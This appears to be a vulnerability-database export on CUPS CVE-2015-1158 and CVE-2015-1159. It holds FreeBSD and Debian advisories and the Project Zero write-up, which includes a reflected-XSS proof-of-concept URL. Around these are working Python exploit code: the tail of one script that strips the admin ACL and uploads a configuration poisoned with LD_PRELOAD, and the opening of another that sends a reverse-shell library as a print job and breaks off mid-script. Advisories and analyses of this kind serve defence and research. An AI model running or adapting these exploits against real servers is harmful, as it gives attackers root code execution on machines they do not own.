\n\"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \nhttp_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \npretty(\"*\",\"stomping ACL\") \npretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp))) \ntime.sleep(1) \npretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp))) \n \nhttp_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"\\x0d\\x0a\") 
\npretty(\"*\",\"checking /admin\") \npretty(\"*\",\">:\\n\" + createDump(http_header_check)) \nres = txrx(rhost,rport,\"tcp\",http_header_check) \npretty(\"*\",\"<:\\n\" + createDump(res)) \nm = re.search('200 OK', res) \nif m is not None: \npretty(\"+\",\"ACL stomp successful\") \nelse: \npretty(\"-\",\"exploit failed\") \nexit(1) \n \n \ndef getConfig(rhost, rport): \ni = random.randint(1,1024) \noriginal_config = \"\" \nhttp_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \npretty(\"*\",\"grabbing configuration file....\") \nres = txrx(rhost,rport,\"tcp\",http_request) \nres_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\") \noriginal_config = res_array[1] \npretty(\"*\",\"config:\\n\" + original_config + \"\\n\") \nreturn original_config \n \ndef putConfig(rhost, rport, config): \nhttp_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Keep-Alive\\x0d\\x0a\" \n\"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \npretty(\"*\",\"overwriting config...\") \npretty(\"*\",\">:\\n\" + createDump(http_request + config)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config))) \n \ndef poisonConfig(config, name): \nconfig = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\" \nreturn config \n \ndef main(): \nrhost = None; \nnoshell = None; \noptions, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',]) \nfor opt, arg in options: \nif opt in ('-h', '--help'): \nusage() \nelif opt in ('-a','--rhost'): \nrhost = arg; \nelif opt in ('-b','--rport'): \nrport = arg; \nelif opt in ('-c','--lib'): \nlibpath = arg; \nelif opt in 
('-f','--stomp-only'): \nnoshell = 1; \nbanner() \nif rhost is None or rport is None: \nusage() \npretty(\"*\",\"locate available printer\") \nprinter = locatePrinters(rhost, rport) \npretty(\"*\",\"stomp ACL\") \nstompACL(rhost, rport, printer) \nif (noshell is not None): \npretty(\"*\",\"fin\") \nexit(0) \npretty(\"*\",\"prepare payload\") \npayload = preparePayload(libpath) \npretty(\"*\",\"spray payload\") \njobid = seedTarget(rhost, rport, printer, payload) \npretty(\"*\",\"grab original config\") \nOG_config = getConfig(rhost, rport) \npretty(\"*\",\"generate poison config\") \nevil_config = poisonConfig(OG_config, jobid) \npretty(\"*\",\"upload poison config\") \nputConfig(rhost, rport, evil_config) \npretty(\"*\",\"fin\") \nexit(0); \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140920/cups-exec.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:33:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "\nCUPS development team reports:\n\nThe new release addresses two security vulnerabilities,\n\t add localizations for German and Russian, and includes\n\t several general bug fixes. 
Changes include:\nSecurity: Fixed CERT VU #810572/CVE-2015-1158/CVE-2015-1159\n\t exploiting the dynamic linker (STR #4609)\nSecurity: The scheduler could hang with malformed\n\t gzip data (STR #4602)\n\n", "edition": 4, "modified": "2015-06-09T00:00:00", "published": "2015-06-09T00:00:00", "id": "A40EC970-0EFA-11E5-90E4-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/a40ec970-0efa-11e5-90e4-d050996490d0.html", "title": "cups -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:17:07", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Package : cups\nVersion : 1.4.4-7+squeeze8\nCVE ID : CVE-2015-1158 CVE-2015-1159\n\nTwo critical vulnerabilities have been found in the CUPS printing \nsystem:\n\nCVE-2015-1158 - Improper Update of Reference Count\n Cupsd uses reference-counted strings with global scope. When parsing\n a print job request, cupsd over-decrements the reference count for a\n string from the request. As a result, an attacker can prematurely\n free an arbitrary string of global scope. They can use this to \n dismantle ACL\u2019s protecting privileged operations, and upload a\n replacement configuration file, and subsequently run arbitrary code\n on a target machine.\n\n This bug is exploitable in default configurations, and does not\n require any special permissions other than the basic ability to\n print.\n\nCVE-2015-1159 - Cross-Site Scripting \n A cross-site scripting bug in the CUPS templating engine allows the\n above bug to be exploited when a user browses the web. 
This XSS is\n reachable in the default configuration for Linux instances of CUPS,\n and allows an attacker to bypass default configuration settings that\n bind the CUPS scheduler to the \u2018localhost\u2019 or loopback interface.\n\n", "edition": 7, "modified": "2015-06-09T10:27:37", "published": "2015-06-09T10:27:37", "id": "DEBIAN:DLA-239-1:10F45", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00003.html", "title": "[SECURITY] [DLA 239-1] cups security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T01:01:57", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3283-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 09, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : cups\nCVE ID : CVE-2015-1158 CVE-2015-1159\n\nIt was discovered that CUPS, the Common UNIX Printing System, is\nvulnerable to a remotely triggerable privilege escalation via cross-site\nscripting and bad print job submission used to replace cupsd.conf on the\nCUPS server.\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.5.3-5+deb7u6.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.7.5-11+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.7.5-12.\n\nWe recommend that you upgrade your cups packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2015-06-09T20:25:07", "published": 
"2015-06-09T20:25:07", "id": "DEBIAN:DSA-3283-1:BE2B4", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00178.html", "title": "[SECURITY] [DSA 3283-1] cups security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:55:59", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3172-1 security@debian.org\nhttp://www.debian.org/security/ Sebastien Delafond\nFebruary 25, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : cups\nCVE ID : CVE-2014-9679\nDebian Bug : 778387\n\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\nSystem, did not correctly parse compressed raster files. By submitting\na specially crafted raster file, a remote attacker could use this\nvulnerability to trigger a buffer overflow.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.5.3-5+deb7u5.\n\nFor the upcoming stable distribution (jessie) and unstable\ndistribution (sid), this problem has been fixed in version 1.7.5-11.\n\nWe recommend that you upgrade your cups packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2015-02-25T18:21:23", "published": "2015-02-25T18:21:23", "id": "DEBIAN:DSA-3172-1:C0A28", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00057.html", "title": "[SECURITY] [DSA 3172-1] cups security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:14:05", "bulletinFamily": "unix", 
"cvelist": ["CVE-2014-9679"], "description": "Package : cups\nVersion : 1.4.4-7+squeeze7\nCVE ID : CVE-2014-9679\nDebian Bug : #778387\n\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\nSystem, did not correctly parse compressed raster files. By submitting\na specially crafted raster file, a remote attacker could use this\nvulnerability to trigger a buffer overflow.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.4.4-7+squeeze7.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.5.3-5+deb7u5.\n\nWe recommend that you upgrade your cups packages.\n\n-- \nBen Hutchings - Debian developer, kernel team member\n", "edition": 7, "modified": "2015-02-27T13:03:36", "published": "2015-02-27T13:03:36", "id": "DEBIAN:DLA-159-1:19AEB", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201502/msg00013.html", "title": "[SECURITY] [DLA 159-1] cups security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:07", "description": "\nCUPS 2.0.3 - Multiple Vulnerabilities", "edition": 1, "published": "2015-06-22T00:00:00", "title": "CUPS 2.0.3 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-22T00:00:00", "id": "EXPLOITPACK:4CB42140E06509F8B1AAEC2A1095ADF4", "href": "", "sourceData": "Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html\n\nAbstract\n\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. 
The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\n\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\n\nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\n\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\n\nSummary\n\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\n\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. 
A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\n\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\nBackground\n\nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\n\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\n\nscheduler/ipp.c:1626:\n\n /*\n * Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\n */\n\n for (i = 0; i < attr->num_values; i ++)\n {\n _cupsStrFree(attr->values[i].string.text);\n attr->values[i].string.text = NULL;\n if (attr->values[i].string.language) \u2190 for all values in an attribute\n {\n _cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\n attr->values[i].string.language = NULL;\n }\n }\n\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\n\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\n\nThe over-decrement prematurely frees the heap block for the target string. 
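The reference-count bookkeeping described above, reduced to a small Python model. This is an added illustration, not CUPS code: the pool, the Location entry and the parsed attribute are simplified stand-ins, the language reference is taken once for the whole attribute as the write-up states, and a released block is represented by clearing the string's text rather than by real heap reuse. It shows why a single-value attribute is harmless while two or more values release a string the configuration still points at.

```python
"""
Model of cupsd's globally scoped, reference-counted string pool and of the
job-originating-host-name teardown in add_job(). Constructed illustration,
not CUPS code: the pool, the Location entry and the parsed attribute are
simplified stand-ins, and a freed block is modelled by clearing its text.
"""


class PoolString:
    """One interned string; text becomes None once its block has been released."""

    def __init__(self, text):
        self.text, self.refs = text, 0


class StringPool:
    def __init__(self):
        self._strings = {}

    def alloc(self, text):
        """_cupsStrAlloc()-style: intern text and take one reference."""
        s = self._strings.get(text)
        if s is None:
            s = self._strings[text] = PoolString(text)
        s.refs += 1
        return s

    def free(self, s):
        """_cupsStrFree()-style: drop one reference; at zero the block goes away."""
        if s.text is None:        # freeing an already-released block: ignored here,
            return                # heap corruption with a real allocator
        s.refs -= 1
        if s.refs == 0:
            del self._strings[s.text]
            s.text = None


class Location:
    """A <Location> ACL entry; its path lives in the same pool as request strings."""

    def __init__(self, pool, path):
        self.path = pool.alloc(path)

    def protects(self, request_path):
        return self.path.text == request_path   # a released name matches nothing


def parsed_host_name_attr(pool, language, n_values):
    """The attribute after parsing, as the write-up describes it:
    n values, and one language reference taken once for all of them."""
    lang = pool.alloc(language)                 # incremented once for the whole attribute
    return [{"text": pool.alloc("A" * 12), "language": lang} for _ in range(n_values)]


def teardown_buggy(pool, values):
    """scheduler/ipp.c add_job() before the fix: language released once per value."""
    for v in values:
        pool.free(v["text"])
        v["text"] = None
        if v["language"] is not None:
            pool.free(v["language"])            # over-decrement whenever n_values > 1
            v["language"] = None


def teardown_fixed(pool, values):
    """ipp_free_values()-style teardown: the shared language reference is released once."""
    lang = values[0]["language"]
    for v in values:
        pool.free(v["text"])
        v["text"] = v["language"] = None
    if lang is not None:
        pool.free(lang)


def admin_still_protected(n_values, teardown):
    """Load an ACL for /admin, handle a job whose language string is also "/admin",
    and report whether the ACL still matches afterwards."""
    pool = StringPool()
    admin = Location(pool, "/admin")                            # "/admin" refs == 1
    values = parsed_host_name_attr(pool, "/admin", n_values)    # "/admin" refs == 2
    teardown(pool, values)
    return admin.protects("/admin")
```

With one value the single decrement is correct; with two or more, the shared "/admin" entry reaches zero while the Location still holds its pointer, which is the premature free the text describes. The attacker chooses the victim string simply by setting attributes-natural-language to collide with an interned configuration string.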
The actual block address will be quickly re-used by subsequent allocations.\n\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\n\n\nA Reflected XSS in the Web Interface (CVE-2015-1159)\n\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\n\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\n\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\n<>\"'&\n\n These are replaced with their HTML entity equivalents ('&lt;' etc...).\n\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\n\n if (*s == '<')\n {\n /*\n * Pass <A HREF=\"url\"> and </A>, otherwise quote it...\n */\n\n if (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\n {\n fputs(\"<A HREF=\\\"\", out);\n s += 9;\n\n while (*s && *s != '\\\"')\n {\n if (*s == '&')\n fputs(\"&amp;\", out);\n else\n putc(*s, out);\n\n s ++;\n }\n\n if (*s)\n s ++;\n\n fputs(\"\\\">\", out);\n }\n\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\n\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. 
However, the template engine's limited context-awareness becomes an issue.\n\nTake this example from templates/help-header.tmp:19:\n\n <P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\n\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\n\nRequesting the following URI will demonstrate this reflected XSS:\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\n\nThe 'QUERY' parameter is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield an HTML page that parses without errors.\n\n\nUpstream Fixes\n\nApple Fix (April 16, 2015):\nhttps://support.apple.com/kb/DL1807\n\nOfficial CUPS fix for downstream vendors (June 8, 2015):\nhttps://www.cups.org/str.php?L4609\nhttp://www.cups.org/blog.php?L1082+I0+Q\n\nProject Zero Bug\n\nFor those interested, the sample exploit can be found here:\n\nhttps://code.google.com/p/google-security-research/issues/detail?id=455\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37336.tar.gz\n\nDisclosure Timeline\n\nMarch 20th, 2015 - Initial notification to Apple\nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\nJune 18th, 2015 - Disclosure + 90 days\nJune 19th, 2015 - P0 publication\n\nAttack Surface Reduction in CUPS 2.0.3+\n\nCUPS 2.0.3 and 2.1 beta contain several prescient implementation changes to limit the risk and impact of future similar bugs:\n\nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead.\nLD_* and DYLD_* 
environment variables are blocked when CUPS is running as root.\nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\n\nAcknowledgements\n\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\n\nConclusion\n\nNo one prints anything anymore anyways.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:07", "description": "\nCUPS 2.0.3 - Remote Command Execution", "edition": 1, "published": "2017-02-03T00:00:00", "title": "CUPS 2.0.3 - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "id": "EXPLOITPACK:892E7440DFB4E752F2AA0B87194C551D", "href": "", "sourceData": "#!/usr/bin/python\n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution\n# Google Dork: n/a\n# Date: 2/2/17\n# Exploit Author: @0x00string\n# Vendor Homepage: cups.org\n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2\n# Version: <2.0.3\n# Tested on: Ubuntu 14/15\n# CVE : CVE-2015-1158\nimport os, re, socket, random, time, getopt, sys\nfrom socket import *\nfrom struct import *\n\ndef banner():\n print '''\n lol ty google\n 0000000000000\n 0000000000000000000 00\n 00000000000000000000000000000\n 0000000000000000000000000000000\n 000000000 0000000000\n 00000000 0000000000\n 0000000 000000000000\n 0000000 000000000000000\n 000000 000000000 000000\n0000000 000000000 000000\n000000 000000000 000000\n000000 000000000 000000\n000000 00000000 000000\n000000 000000000 000000\n0000000 000000000 0000000\n 000000 000000000 000000\n 0000000000000000 0000000\n 0000000000000 0000000\n 00000000000 00000000\n 00000000000 000000000\n 0000000000000000000000000000000\n 00000000000000000000000000000\n 000 0000000000000000000\n 0000000000000\n @0x00string\nhttps://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py\n'''\n\ndef usage ():\n print (\"python script.py 
<args>\\n\"\n \" -h, --help: Show this message\\n\"\n \" -a, --rhost: Target IP address\\n\"\n \" -b, --rport: Target IPP service port\\n\"\n \" -c, --lib /path/to/payload.so\\n\"\n \" -f, --stomp-only Only stomp the ACL (no postex)\\n\"\n \"\\n\"\n \"Examples:\\n\"\n \"python script.py -a 10.10.10.10 -b 631 -f\\n\"\n \"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\")\n exit()\n\ndef pretty (t, m):\n if (t is \"+\"):\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"-\"):\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"*\"):\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"!\"):\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\n\ndef createDump (input):\n d, b, h = '', [], []\n u = list(input)\n for e in u:\n h.append(e.encode(\"hex\"))\n if e == '0x0':\n b.append('0')\n elif 30 > ord(e) or ord(e) > 128:\n b.append('.')\n elif 30 < ord(e) or ord(e) < 128:\n b.append(e)\n\n i = 0\n while i < len(h):\n if (len(h) - i ) >= 16:\n d += ' '.join(h[i:i+16])\n d += \" \"\n d += ' '.join(b[i:i+16])\n d += \"\\n\"\n i = i + 16\n else:\n d += ' '.join(h[i:(len(h) - 0 )])\n pad = len(' '.join(h[i:(len(h) - 0 )]))\n d += ' ' * (56 - pad)\n d += ' '.join(b[i:(len(h) - 0 )])\n d += \"\\n\"\n i = i + len(h)\n\n return d\n\nclass tcpsock:\n def __init__(self, sock=None):\n if sock is None:\n self.sock = socket(\n AF_INET, SOCK_STREAM)\n self.sock.settimeout(30)\n else:\n self.sock = sock\n def connect(self, host, port):\n self.sock.connect((host, int(port)))\n def tx(self, msg):\n self.sock.send(msg)\n def rx(self):\n tmp = self.sock.recv(1024)\n msg = \"\"\n while tmp:\n msg += tmp\n tmp = self.sock.recv(1024)\n return msg\n\ndef txrx (ip, port, proto, txpacket):\n if (proto is \"tcp\"):\n sock = tcpsock()\n elif (proto is \"udp\"):\n sock = udpsock()\n else:\n return None\n sock.connect(ip, port)\n sock.tx(txpacket)\n rxpacket = sock.rx()\n return rxpacket\n\ndef locatePrinters(rhost, 
rport=\"631\"):\n request = ( \"GET /printers HTTP/1.1\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n response = txrx(rhost, int(rport), \"tcp\", request)\n if response is not None:\n m = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)\n if m is not None:\n printer = m.group(1)\n pretty(\"+\",\"printer found: \" + printer)\n return printer\n else:\n pretty(\"-\",\"no printers\")\n exit(1)\n else:\n pretty(\"-\",\"no printers\")\n exit(1)\n\ndef preparePayload(libpath):\n with open(libpath, 'rb') as f:\n payload = f.read()\n if payload is not None:\n pretty(\"*\",\"Payload:\\n\" + createDump(payload))\n else:\n pretty(\"-\",\"something went wrong\")\n usage()\n return payload\n\ndef seedTarget(rhost, rport, printer, payload):\n i = random.randint(1,3)\n reqid = str(pack(\">i\",(i+2)))\n reqid2 = str(pack(\">i\",(i+3)))\n printer_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer\n\n create_job_packet = (\"\\x02\\x00\"\n \"\\x00\\x05\"+\n reqid+\n \"\\x01\"\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\n \"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\"\n \"\\x02\"\n \"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\n \"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\"\n \"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\"\n \"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\"\n \"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\"\n 
\"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\"\n \"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\n \"\\x03\")\n pretty(\"*\",\"Sending createJob\")\n\n http_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n createJobRequest = http_header1 + create_job_packet\n blah = txrx(rhost,int(rport),\"tcp\",createJobRequest)\n if blah is not None:\n m = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah)\n if m is not None:\n jobid = m.group(1)\n else:\n pretty(\"-\",\"something went wrong\");\n exit()\n\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\n pretty(\"*\", \"Sending sendJob\")\n\n send_document_packet = (\"\\x02\\x00\"\n \"\\x00\\x06\"+\n reqid2+\n \"\\x01\"\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\n \"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) +\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\n \"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\"\n \"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\"\n \"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\"\n \"\\x03\"+\n payload)\n\n http_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n 
